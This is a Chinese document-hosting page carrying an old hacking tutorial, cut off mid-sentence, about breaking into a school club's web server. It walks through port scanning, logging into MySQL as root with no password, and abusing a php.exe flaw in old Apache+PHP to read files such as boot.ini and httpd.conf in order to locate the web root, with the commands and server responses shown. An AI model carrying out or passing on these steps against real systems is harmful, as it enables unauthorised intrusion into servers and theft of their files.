欢迎来到天天文库
浏览记录
ID:34786180
大小:62.68 KB
页数:3页
时间:2019-03-10
《看紧你的3306端口一次通过mysql的入侵》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库。
1、看紧你的3306端口,一次通过mysql的入侵阅读:217时间:2009-8-118:00:30------------------------------------------------------------------用superscan扫了一下某个c类的网段,寻找开放80端口的机器,结果就只有一台机器开放了80端口,试着连了一下,是我们学校某个社团的的主页。从端口的banner来看应该是apache(win32),证实一下telnet211.87.xxx.xxxget(回车)
2、IETF//DTDHTML2.0//EN">
Invalidmethodinrequestget
3、下看得更清楚了据我猜测,应该是“apache+mysql+php”的黄金组合吧习惯性的mysql-h211.87.xxx.xxx果然连上了WelcometotheMySQLmonitor.Commandsendwithorg.YourMySQLconnectionidis17toserverversion:3.23.53-max-ntTypehelp;orhforhelp.Typectoclearthebuffer.mysql>断开试着mysql-h211.87.xxx.xxx-uroot-ppassword:Welcomet
4、otheMySQLmonitor.Commandsendwithorg.YourMySQLconnectionidis18toserverversion:3.23.53-max-ntTypehelp;orhforhelp.Typectoclearthebuffer.mysql>呵呵,大家看到了他的root用户没有密码,这是我今天要说的第一个主题。这是相当的危险的,碰见这种情况,有99.999%的可能可以进入既然使用的apache+php,只要找到他在本地存放的web的物理路径就为所欲为了呵呵下一个问题是我今天要说的重点怎么样才
5、能知道那台主机的存放的web的物理路径?方法有很多种,在这里我介绍2种方法供初学者参考首先要告诉大家的是低版本的apache+php有一个漏洞提http://xxx.xxxx.xxx.xxx/php/php.exe?对方的物理文件名就可以把那个物理文件下载下来。于是提http://211.87.xxx.xxx/php/php.exe?c:a.txt返回Noinputfilespecified.(没有这个漏洞的话提示找不到网页)好的,这说明他有这个漏洞。在提http://211.87.xxx.xxx/php/php.exe?c:b
6、oot.ini返回[bootloader]timeout=30default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS[operatingsystems]multi(0)disk(0)rdisk(0)partition(1)WINDOWS="MicrosoftWindowsXPProfessional"/fastdetect呵呵,装的还是xp。好了,我们可以猜测对方apache的conf文件的物理位置了http://211.87.xxx.xxx/php/php.exe?c:apach
7、econfhttpd.confNoinputfilespecified.http://211.87.xxx.xxx/php/php.exe?d:apacheconfhttpd.confNoinputfilespecified.http://211.87.xxx.xxx/php/php.exe?e:apacheconfhttpd.confNoinputfilespecified.http://211.87.xxx.xxx/php/php.exe?c:ProgramFilesapacheconfhttpd.con
8、fNoinputfilespecified.http://211.87.xxx.xxx/php/php.exe?f:apacheconfhttpd.conf猜到了,返回了好多东西找到我们想要的#DocumentRoot:Thed
此文档下载收益归作者所有